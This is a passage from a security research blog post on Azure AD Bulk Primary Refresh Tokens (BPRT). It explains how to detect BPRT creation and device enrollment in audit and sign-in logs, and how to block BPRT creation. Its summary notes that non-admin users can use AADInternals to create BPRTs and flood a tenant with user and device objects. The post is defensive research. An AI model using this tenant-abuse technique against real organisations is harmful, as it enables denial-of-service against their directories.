<p><img src="/images/posts/bprt_9.png" alt="hunt2" /></p>

<p>In the Modified Properties tab, we can see that the UPN of user creating the BPRT is added to <strong>OtherMail</strong> attribute of the resulting user.
We can also see that the <strong>UserPrincipalName</strong> starts always with &ldquo;package_&rdquo; prefix.</p>

<p><img src="/images/posts/bprt_10.png" alt="hunt3" /></p>

<p>BPRT creation can also be spotted from <strong>Sign-ins log</strong> as the created user is logged in within one to two seconds after it is created using
the following &ldquo;AADJ CSP&rdquo; client id and an empty Resource ID:</p>

<pre><code>b90d5b8f-5503-4153-b545-b31cecfaece2
</code></pre>

<p><img src="/images/posts/bprt_11.png" alt="hunt4" /></p>

<h2 id="using-bprt-to-get-access-tokens">Using BPRT to get access tokens</h2>

<p><strong>Note:</strong> Using BPRT is not always rogue behaviour: it is meant for joining multiple devices!</p>

<p>The access tokens fetched for <strong>AAD Join</strong> using BPRT can be seen in <strong>User sign-ins (non-interactive)</strong> tab of the <strong>Sign-ins log</strong>.
The used client id is again &ldquo;AADJ CSP&rdquo; but now the resource is DSR:</p>

<p><img src="/images/posts/bprt_12.png" alt="hunt5" /></p>

<p>Similarly, the access tokens fetched for <strong>Intune</strong> using BPRT can be seen in <strong>User sign-ins (non-interactive)</strong> tab of the <strong>Sign-ins log</strong>.
The used client id is again &ldquo;AADJ CSP&rdquo; but now the resource is Microsoft Intune Enrollment:</p>

<pre><code>d4ebce55-015a-49b5-a083-c84d1797ae8c
</code></pre>

<p><img src="/images/posts/bprt_13.png" alt="hunt6" /></p>

<h2 id="enrolling-devices-to-azure-ad">Enrolling devices to Azure AD</h2>

<p><strong>Note:</strong> Using BPRT is not always rogue behaviour: it is meant for joining multiple devices!</p>

<p>When the device is joined to Azure AD, there are multiple events in the <strong>Audit log</strong>.
The event we are interested in is of type &ldquo;Add registered owner to device&rdquo;. In the <strong>Target(s)</strong> tab we can see that the target user&rsquo;s UPN starts with
&ldquo;package_&rdquo; and thus is a BPRT user.</p>

<p><img src="/images/posts/bprt_14.png" alt="hunt7" /></p>

<h2 id="enrolling-devices-to-intune">Enrolling devices to Intune</h2>

<p><strong>Note:</strong> Using BPRT is not always rogue behaviour: it is meant for joining multiple devices!</p>

<p>When the device is succesfully joined to Intune, there is one event in the <strong>Audit log</strong>.
The event we are interested in is of type &ldquo;Update device&rdquo; initiated by &ldquo;Microsoft Intune&rdquo;.
In the <strong>Target(s)</strong> tab we can see the ID of the device which matches the one seen above.
In the <strong>Modified Properties</strong> tab we can see that the &ldquo;IsManaged&rdquo; property is set to &ldquo;true&rdquo;:</p>

<p><img src="/images/posts/bprt_16.png" alt="hunt9" /></p>

<h1 id="preventing">Preventing</h1>

<p>One prequisite for creating BPRTs is that the Windows Configuration Designer (WCD) app has been given a consent by an administrator.
Therefore, it would be fair to assume that removing the app would prevent creating BPRTs. However, based on my observations, <strong>removing the WCD app
does not prevent creating BPRTs using different client ids!</strong></p>

<p>To my best knowledge, only way to prevent creating BPRTs is to prevent users joining devices to Azure AD:</p>

<p><img src="/images/posts/bprt_17.png" alt="preventing BPRT" /></p>

<h1 id="summary">Summary</h1>

<p>BPRT tokens can be easily created with AADInternals without any administrator rights, provided that the user has rights to enroll devices to Azure AD and that WCD app has been used earlier in the tenant.
This allows rogue users to conduct DOS attacks against their tenant by filling Azure AD with user objects.</p>

<p>With a BPRT, an access token can be fetched to join devices to Azure AD and Intune, provided that the BPRT user has rights to enroll devices to Azure AD and Intune.
This allows rogue users to conduct DOS attacks against their tenant by filling Azure AD with device objects, regardless of the device number restrictions. All other restrictions, like Intune
device type restrictions are still applied.</p>

<p><strong>Only way to prevent creating BPRTs is to prevent users joining devices to Azure AD!</strong></p>

<h1 id="references">References</h1>

<ul>
<li>Microsoft: <a href="https://docs.microsoft.com/en-us/mem/intune/enrollment/windows-bulk-enroll" target="_blank">Bulk enrollment for Windows devices</a></li>
<li>Microsoft: <a href="https://docs.microsoft.com/en-us/azure/active-directory/enterprise-users/directory-service-limits-restrictions" target="_blank">Azure AD service limits and restrictions</a></li>
</ul>
		</div>
		
<div class="post__tags tags clearfix">
	<img class="icon icon-tag" src="/images/tags.png" width="16" height="16" viewBox="0 0 16 16">
	
	<ul class="tags__list">
		<li class="tags__item"><a class="tags__link" href="/tags/azure-active-directory/" rel="tag">Azure Active Directory</a></li>
		<li class="tags__item"><a class="tags__link" href="/tags/azure/" rel="tag">Azure</a></li>
		<li class="tags__item"><a class="tags__link" href="/tags/security/" rel="tag">security</a></li>
		<li class="tags__item"><a class="tags__link" href="/tags/mfa/" rel="tag">MFA</a></li>
		<li class="tags__item"><a class="tags__link" href="/tags/bprt/" rel="tag">BPRT</a></li>
	</ul>
</div>

		<div class="post__tags tags clearfix">
<ul class="tags__list">
	<li class="tags__item"><a class="tags__link" href="http://twitter.com/intent/tweet?url=http%3a%2f%2fo365blog.com%2fpost%2fbprt%2f&text=BPRT%20unleashed%3a%20Joining%20multiple%20devices%20to%20Azure%20AD%20and%20Intune&tw_p=tweetbutton" title="Share in Twitter" target="_blank" rel="nofollow"><i class="fa fa-twitter" aria-hidden="true"></i></a></li>
	<li class="tags__item"><a class="tags__link" href="https://www.linkedin.com/shareArticle?url=http%3a%2f%2fo365blog.com%2fpost%2fbprt%2f&mini=true&title=BPRT%20unleashed%3a%20Joining%20multiple%20devices%20to%20Azure%20AD%20and%20Intune&summary=&source=o365blog.com" title="Share in LinkedIn" target="_blank" rel="nofollow"><i class="fa fa-linkedin" aria-hidden="true"></i></a></li>
</ul>
</div>
	</article>
	
<div class="authorbox clearfix">
	<figure class="authorbox__avatar">
		<img alt="Dr Nestori Syynimaa (@DrAzureAD) avatar" src="/images/nestori.jpg" class="avatar" height="90" width="90">
	</figure>
	<div class="authorbox__header">
		<span class="authorbox__name">About Dr Nestori Syynimaa (@DrAzureAD)</span>
	</div>
	<div class="authorbox__description">
		Dr Syynimaa works as Senior Principal Information Security Researcher at Secureworks CTU (Counter Threat Unit). <br> Before moving to his current position, Dr Syynimaa worked as a CIO, consultant, trainer, and university lecturer for over 20 years. He is a regular speaker in scientific and professional conferences related to Microsoft 365 and Azure AD security. <br><br>Dr Syynimaa is Microsoft Certified Expert (Microsoft 365), Microsoft Certified Azure Solutions Architect Expert, Microsoft Certified Trainer, Microsoft MVP (Enterprise Mobility, Identity and Access &amp; Intune), and Microsoft Most Valuable Security Researcher (MVR).
	</div>
</div>
	
<nav class="post-nav row clearfix" itemscope="itemscope" itemtype="http://schema.org/SiteNavigationElement">
	<div class="post-nav__item post-nav__item--prev col-1-2">
		<a class="post-nav__link" href="/post/teams-policies/" rel="prev"><span class="post-nav__caption">«Previous</span><p class="post-nav__post-title">Abusing Teams client protocol to bypass Teams security policies</p></a>
	</div>
	<div class="post-nav__item post-nav__item--next col-1-2">
		<a class="post-nav__link" href="/post/devices/" rel="next"><span class="post-nav__caption">Next»</span><p class="post-nav__post-title">Deep-dive to Azure AD device join</p></a>
	</div>
</nav>

	
<div class="comments">
	<div id="disqus_thread"></div>
<script>
    var disqus_config = function () {
    
    
    
    };
    (function() {
        if (["localhost", "127.0.0.1"].indexOf(window.location.hostname) != -1) {
            document.getElementById('disqus_thread').innerHTML = 'Disqus comments not available by default when the website is previewed locally.';
            return;
        }
        var d = document, s = d.createElement('script'); s.async = true;
        s.src = '//' + "o365blog-com" + '.disqus.com/embed.js';
        s.setAttribute('data-timestamp', +new Date());
        (d.head || d.body).appendChild(s);
    })();
</script>
<noscript>Please enable JavaScript to view the <a href="https://disqus.com/?ref_noscript">comments powered by Disqus.</a></noscript>
<a href="https://disqus.com" class="dsq-brlink">comments powered by <span class="logo-disqus">Disqus</span></a>
</div>

</main>

<aside class="sidebar" itemscope="itemscope" itemtype="http://schema.org/WPSideBar">
	
<div class="widget-search widget">
	<form class="widget-search__form" role="search" method="get" action="//google.com/search">
		<label>
			<span class="screen-reader-text">Search for:</span>
			<input class="widget-search__field" type="search" placeholder="SEARCH..." value="" name="q">
		</label>
		<input class="widget-search__submit" type="submit" value="Search">
		<input type="hidden" name="sitesearch" value="http://o365blog.com" />
	</form>
</div>
	
<div class="widget-recent widget">
	<h4 class="widget__title">Recent Posts</h4>
	<div class="widget__content">
		<ul class="widget__list">
			<li class="widget__item"><a class="widget__link" href="/post/pta/">Exploiting Azure AD PTA vulnerabilities: Creating backdoor and harvesting credentials</a></li>
			<li class="widget__item"><a class="widget__link" href="/post/gmsa/">Hunt for the gMSA secrets</a></li>
			<li class="widget__item"><a class="widget__link" href="/post/august_2022/">AADInternals World Tour August 2022: USA</a></li>
			<li class="widget__item"><a class="widget__link" href="/post/deviceidentity/">Stealing and faking Azure AD device identities</a></li>
			<li class="widget__item"><a class="widget__link" href="/post/partners/">Microsoft partners: The Good, The Bad, or The Ugly?</a></li>
		</ul>
	</div>
</div>

	
<div class="widget-categories widget">
	<h4 class="widget__title">Categories</h4>
	<div class="widget__content">
		<ul class="widget__list">
			<li class="widget__item"><a class="widget__link" href="/categories/"></a></li>
			<li class="widget__item"><a class="widget__link" href="/categories/article">Article</a></li>
			<li class="widget__item"><a class="widget__link" href="/categories/blog">Blog</a></li>
		</ul>
	</div>
</div>
	
<div class="widget-social widget">
	<h4 class="widget-social__title widget__title">Social</h4>
	<div class="widget-social__content widget__content">
		<div class="widget-social__item widget__item">
			<a class="widget-social__link widget__link btn" title="Twitter" rel="noopener noreferrer" href="https://twitter.com/DrAzureAD" target="_blank">
				<svg class="widget-social__link-icon icon-twitter" viewBox="0 0 384 312" width="24" height="24" xmlns="http://www.w3.org/2000/svg" fill="#fff"><path d="m384 36.9c-14.1 6.3-29.3 10.5-45.2 12.4 16.3-9.7 28.8-25.2 34.6-43.6-15.2 9-32.1 15.6-50 19.1-14.4-15.2-34.9-24.8-57.5-24.8-43.5 0-78.8 35.3-78.8 78.8 0 6.2.7 12.2 2 17.9-65.5-3.3-123.5-34.6-162.4-82.3-6.7 11.6-10.6 25.2-10.6 39.6 0 27.3 13.9 51.4 35 65.6-12.9-.4-25.1-4-35.7-9.9v1c0 38.2 27.2 70 63.2 77.2-6.6 1.8-13.6 2.8-20.8 2.8-5.1 0-10-.5-14.8-1.4 10 31.3 39.1 54.1 73.6 54.7-27 21.1-60.9 33.7-97.8 33.7-6.4 0-12.6-.4-18.8-1.1 34.9 22.4 76.3 35.4 120.8 35.4 144.9 0 224.1-120 224.1-224.1 0-3.4-.1-6.8-.2-10.2 15.4-11.1 28.7-25 39.3-40.8z"/></svg>
				<span>Twitter</span>
			</a>
		</div>
		<div class="widget-social__item widget__item">
			<a class="widget-social__link widget__link btn" title="" rel="noopener noreferrer" href="https://linkedin.com/in/nestori" target="_blank">
				<svg class="widget-social__link-icon icon-linkedin" viewBox="0 0 352 352" width="24" height="24" fill="#fff" xmlns="http://www.w3.org/2000/svg"><path d="M0,40v272c0,21.9,18.1,40,40,40h272c21.9,0,40-18.1,40-40V40c0-21.9-18.1-40-40-40H40C18.1,0,0,18.1,0,40z M312,32 c4.6,0,8,3.4,8,8v272c0,4.6-3.4,8-8,8H40c-4.6,0-8-3.4-8-8V40c0-4.6,3.4-8,8-8H312z M59.5,87c0,15.2,12.3,27.5,27.5,27.5 c15.2,0,27.5-12.3,27.5-27.5c0-15.2-12.3-27.5-27.5-27.5C71.8,59.5,59.5,71.8,59.5,87z M187,157h-1v-21h-45v152h47v-75 c0-19.8,3.9-39,28.5-39c24.2,0,24.5,22.4,24.5,40v74h47v-83.5c0-40.9-8.7-72-56.5-72C208.5,132.5,193.3,145.1,187,157z M64,288h47.5 V136H64V288z"/></svg>
				<span>LinkedIn</span>
			</a>
		</div>
		<div class="widget-social__item widget__item">
			<a class="widget-social__link widget__link btn" title="Email" href="mailto:nestori.syynimaa@gerenios.com">
				<svg class="widget-social__link-icon icon-mail" viewBox="0 0 416 288" width="24" height="24" xmlns="http://www.w3.org/2000/svg" fill="#fff"><path d="m0 16v256 16h16 384 16v-16-256-16h-16-384-16zm347 16-139 92.5-139-92.5zm-148 125.5 9 5.5 9-5.5 167-111.5v210h-352v-210z"/></svg>
				<span>nestori.syynimaa@gerenios.com</span>
			</a>
		</div>
	</div>
</div>

	
<div class="widget-taglist widget">
	<h4 class="widget__title">Tags</h4>
	<div class="widget__content">
		<a class="widget__link widget__link--taglist" href="/tags/aadconnect" title="aadconnect">aadconnect (2)</a>
		<a class="widget__link widget__link--taglist" href="/tags/aadinternals" title="aadinternals">aadinternals (10)</a>
		<a class="widget__link widget__link--taglist" href="/tags/abusing" title="abusing">abusing (1)</a>
		<a class="widget__link widget__link--taglist" href="/tags/active-directory" title="active-directory">active-directory (1)</a>
		<a class="widget__link widget__link--taglist" href="/tags/adfs" title="adfs">adfs (5)</a>
		<a class="widget__link widget__link--taglist" href="/tags/admin" title="admin">admin (3)</a>
		<a class="widget__link widget__link--taglist" href="/tags/administration" title="administration">administration (1)</a>
		<a class="widget__link widget__link--taglist" href="/tags/authentication" title="authentication">authentication (1)</a>
		<a class="widget__link widget__link--taglist" href="/tags/azure" title="azure">azure (20)</a>
		<a class="widget__link widget__link--taglist" href="/tags/azure-active-directory" title="azure-active-directory">azure-active-directory (27)</a>
		<a class="widget__link widget__link--taglist" href="/tags/azuread" title="azuread">azuread (4)</a>
		<a class="widget__link widget__link--taglist" href="/tags/backdoor" title="backdoor">backdoor (1)</a>
		<a class="widget__link widget__link--taglist" href="/tags/blackhat" title="blackhat">blackhat (2)</a>
		<a class="widget__link widget__link--taglist" href="/tags/blue-team" title="blue-team">blue-team (1)</a>
		<a class="widget__link widget__link--taglist" href="/tags/bprt" title="bprt">bprt (2)</a>
		<a class="widget__link widget__link--taglist" href="/tags/browser" title="browser">browser (1)</a>
		<a class="widget__link widget__link--taglist" href="/tags/compromise" title="compromise">compromise (1)</a>
		<a class="widget__link widget__link--taglist" href="/tags/conferences" title="conferences">conferences (1)</a>
		<a class="widget__link widget__link--taglist" href="/tags/defcon" title="defcon">defcon (1)</a>
		<a class="widget__link widget__link--taglist" href="/tags/desktop-sso" title="desktop-sso">desktop-sso (1)</a>
		<a class="widget__link widget__link--taglist" href="/tags/device" title="device">device (3)</a>
		<a class="widget__link widget__link--taglist" href="/tags/dns" title="dns">dns (3)</a>
		<a class="widget__link widget__link--taglist" href="/tags/email" title="email">email (2)</a>
		<a class="widget__link widget__link--taglist" href="/tags/encryption" title="encryption">encryption (1)</a>
		<a class="widget__link widget__link--taglist" href="/tags/exchange" title="exchange">exchange (1)</a>
		<a class="widget__link widget__link--taglist" href="/tags/federation" title="federation">federation (2)</a>
		<a class="widget__link widget__link--taglist" href="/tags/forensics" title="forensics">forensics (1)</a>
		<a class="widget__link widget__link--taglist" href="/tags/gdpr" title="gdpr">gdpr (1)</a>
		<a class="widget__link widget__link--taglist" href="/tags/global-administrator" title="global-administrator">global-administrator (1)</a>
		<a class="widget__link widget__link--taglist" href="/tags/graph" title="graph">graph (1)</a>
		<a class="widget__link widget__link--taglist" href="/tags/groups" title="groups">groups (1)</a>
		<a class="widget__link widget__link--taglist" href="/tags/guest" title="guest">guest (2)</a>
		<a class="widget__link widget__link--taglist" href="/tags/hybrid-join" title="hybrid-join">hybrid-join (3)</a>
		<a class="widget__link widget__link--taglist" href="/tags/identity" title="identity">identity (2)</a>
		<a class="widget__link widget__link--taglist" href="/tags/inactive" title="inactive">inactive (1)</a>
		<a class="widget__link widget__link--taglist" href="/tags/insider" title="insider">insider (1)</a>
		<a class="widget__link widget__link--taglist" href="/tags/intune" title="intune">intune (1)</a>
		<a class="widget__link widget__link--taglist" href="/tags/join" title="join">join (3)</a>
		<a class="widget__link widget__link--taglist" href="/tags/logs" title="logs">logs (1)</a>
		<a class="widget__link widget__link--taglist" href="/tags/mailbox" title="mailbox">mailbox (1)</a>
		<a class="widget__link widget__link--taglist" href="/tags/mdm" title="mdm">mdm (1)</a>
		<a class="widget__link widget__link--taglist" href="/tags/mfa" title="mfa">mfa (6)</a>
		<a class="widget__link widget__link--taglist" href="/tags/office-365" title="office-365">office-365 (9)</a>
		<a class="widget__link widget__link--taglist" href="/tags/office365" title="office365">office365 (9)</a>
		<a class="widget__link widget__link--taglist" href="/tags/on-prem" title="on-prem">on-prem (2)</a>
		<a class="widget__link widget__link--taglist" href="/tags/onedrive" title="onedrive">onedrive (1)</a>
		<a class="widget__link widget__link--taglist" href="/tags/outsider" title="outsider">outsider (2)</a>
		<a class="widget__link widget__link--taglist" href="/tags/partner" title="partner">partner (2)</a>
		<a class="widget__link widget__link--taglist" href="/tags/password" title="password">password (1)</a>
		<a class="widget__link widget__link--taglist" href="/tags/persistence" title="persistence">persistence (1)</a>
		<a class="widget__link widget__link--taglist" href="/tags/phishing" title="phishing">phishing (2)</a>
		<a class="widget__link widget__link--taglist" href="/tags/planner" title="planner">planner (1)</a>
		<a class="widget__link widget__link--taglist" href="/tags/powershell" title="powershell">powershell (13)</a>
		<a class="widget__link widget__link--taglist" href="/tags/prt" title="prt">prt (6)</a>
		<a class="widget__link widget__link--taglist" href="/tags/pta" title="pta">pta (2)</a>
		<a class="widget__link widget__link--taglist" href="/tags/recon" title="recon">recon (2)</a>
		<a class="widget__link widget__link--taglist" href="/tags/reconnaissance" title="reconnaissance">reconnaissance (4)</a>
		<a class="widget__link widget__link--taglist" href="/tags/seamless-sso" title="seamless-sso">seamless-sso (1)</a>
		<a class="widget__link widget__link--taglist" href="/tags/security" title="security">security (31)</a>
		<a class="widget__link widget__link--taglist" href="/tags/sso" title="sso">sso (2)</a>
		<a class="widget__link widget__link--taglist" href="/tags/sync" title="sync">sync (1)</a>
		<a class="widget__link widget__link--taglist" href="/tags/synchronisation" title="synchronisation">synchronisation (1)</a>
		<a class="widget__link widget__link--taglist" href="/tags/t2" title="t2">t2 (1)</a>
		<a class="widget__link widget__link--taglist" href="/tags/talks" title="talks">talks (1)</a>
		<a class="widget__link widget__link--taglist" href="/tags/teams" title="teams">teams (3)</a>
		<a class="widget__link widget__link--taglist" href="/tags/user" title="user">user (1)</a>
		<a class="widget__link widget__link--taglist" href="/tags/virtual-machine" title="virtual-machine">virtual-machine (1)</a>
	</div>
</div>
</aside>

	</div>
		<footer class="footer" itemscope="itemscope" itemtype="http://schema.org/WPFooter">
			<div class="container container-inner">
				<p class="footer__copyright"><span><a href="https://creativecommons.org/licenses/by/4.0/" target="_blank"><img src="/images/CC-BY.png"></a> </span></p>
			</div>
		</footer>
	</div>

<script>
	var navigation = responsiveNav(".menu", {
		navClass: "menu--collapse",
	});
</script>
</body>
</html>
